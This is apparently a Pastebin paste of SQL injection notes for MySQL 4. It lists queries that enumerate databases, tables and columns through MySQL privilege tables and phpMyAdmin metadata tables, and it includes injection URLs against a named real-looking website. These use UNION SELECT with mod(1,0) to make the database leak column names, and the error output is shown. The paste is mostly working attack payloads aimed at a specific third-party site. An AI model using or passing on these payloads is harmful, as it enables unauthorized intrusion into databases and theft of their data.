Advertisement
Guest User

tequila

a guest
May 5th, 2016
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.23 KB | None | 0 0
  1. mysql version 4
  2. dbs-
  3. select db from mysql.db
  4. tables-
  5. #1
  6. select table_name from mysql.tables_priv
  7. select table_name from mysql.columns_priv
  8. (if tables or columns privileges not set, these tables are empty).
  9. #2
  10. https://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/
  11. ^ on 2.b
  12.  
  13. columns-
  14. http://bridgeyear.com/general.php?id=33 and (select*from general)=1
  15. 21 columns
  16. http://bridgeyear.com/general.php?id=33 and (select*from general UNION SELECT mod(1,0),2,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20)=(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
  17. Column 'id' cannot be null
  18. http://bridgeyear.com/general.php?id=33 and (select*from general UNION SELECT 1,mod(1,0),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20)=(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
  19. Column 'orden' cannot be null
  20.  
  21. select user,dbase,db_name,table_name,column_name from phpmyadmin.pma_column_info
  22. select query from phpmyadmin.pma_column_info
  23. select table_name from phpmyadmin.pma_designer_coords
  24. select table from phpmyadmin.pma_history
  25. select db_name from phpmyadmin.pma_pdf_pages
  26. select master_table from phpmyadmin.pma_relation
  27. select db_name,table_name from phpmyadmin.pma_table_coords / pma_table_info / pma_tracking
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement